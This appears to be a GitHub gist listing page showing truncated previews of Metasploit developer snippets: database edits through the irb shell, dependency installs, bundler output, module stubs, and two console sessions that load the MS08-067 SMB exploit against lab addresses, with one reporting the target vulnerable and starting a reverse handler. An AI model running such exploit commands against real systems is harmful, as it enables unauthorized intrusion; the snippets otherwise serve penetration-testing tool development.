This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
msf > workspace -a demo_for_steve | |
[*] Added workspace: demo_for_steve | |
msf > hosts -a "192.168.1.200" <---- Say you wanna modify this host's name and comments | |
[*] Time: 2015-03-07 19:58:45 UTC Host: host=192.168.1.200 | |
msf > irb | |
[*] Starting IRB shell... | |
>> id = framework.db.get_host(:address => '192.168.1.200').id | |
=> 488 | |
>> framework.db.hosts.update(id, :comments => "This is a new comment") |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$ msfconsole | |
msf > set rhost 192.168.1.148 | |
rhost => 192.168.1.148 | |
msf > use exploit/windows/smb/ms08_067_netapi | |
msf exploit(ms08_067_netapi) > show options | |
Module options (exploit/windows/smb/ms08_067_netapi): | |
Name Current Setting Required Description | |
---- --------------- -------- ----------- |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
sudo apt-get -y install \ | |
build-essential zlib1g zlib1g-dev \ | |
libxml2 libxml2-dev libxslt-dev locate \ | |
libreadline6-dev libcurl4-openssl-dev git-core \ | |
libssl-dev libyaml-dev openssl autoconf libtool \ | |
ncurses-dev bison curl wget postgresql \ | |
postgresql-contrib libpq-dev \ | |
libapr1 libaprutil1 libsvn1 \ | |
libpcap-dev libsqlite3-dev |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
sinn3r$ rvm use ruby-1.9.3-p448 | |
Using /Users/sinn3r/.rvm/gems/ruby-1.9.3-p448 | |
sinn3r$ ./msfpayload -h | |
[!] ************************************************************************ | |
[!] * The utility msfpayload is deprecated! * | |
[!] * It will be removed on or about 2015-06-08 * | |
[!] * Please use msfvenom instead * | |
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 * | |
[!] ************************************************************************ | |
Could not find rake-10.4.2 in any of the sources |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
sinn3r $ cd ~/rapid7/msf | |
sinn3r $ bundle install | |
Resolving dependencies... | |
Using rake 10.4.2 | |
Using i18n 0.6.11 | |
Using multi_json 1.0.4 | |
Using activesupport 3.2.21 | |
Using builder 3.0.4 | |
Using activemodel 3.2.21 | |
Using erubis 2.7.0 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## | |
# This module requires Metasploit: http://metasploit.com/download | |
# Current source: https://github.com/rapid7/metasploit-framework | |
## | |
require 'msf/core' | |
class Metasploit3 < Msf::Exploit::Remote | |
Rank = NormalRanking |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# | |
# $Id$ | |
# $Revision$ | |
# | |
module Msf | |
### | |
# | |
# This class hooks all session creation events and plays a sound |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$ ./msfconsole -q | |
msf > use exploit/windows/smb/ms08_067_netapi | |
msf exploit(ms08_067_netapi) > set rhost 192.168.1.80 | |
rhost => 192.168.1.80 | |
msf exploit(ms08_067_netapi) > check | |
[+] 192.168.1.80:445 - The target is vulnerable. | |
msf exploit(ms08_067_netapi) > run | |
[*] Started reverse handler on 192.168.1.64:4444 | |
[*] Automatically detecting the target... |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
msf > irb | |
[*] Starting IRB shell... | |
>> require 'method_source' | |
=> true | |
>> framework.db.method(:import_ip_list_file).source_location | |
=> ["/Users/sinn3r/rapid7/msf/lib/msf/core/db_manager/import/ip_list.rb", 18] | |
>> framework.db.method(:import_ip_list_file).parameters | |
=> [[:opt, :args]] | |
>> puts framework.db.method(:import_ip_list_file).source |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
require 'msf/core' | |
class Metasploit3 < Msf::Exploit::Remote | |
Rank = NormalRanking | |
include Msf::Exploit::Remote::HttpServer::HTML | |
def initialize(info={}) | |
super(update_info(info, | |
'Name' => "IE test", |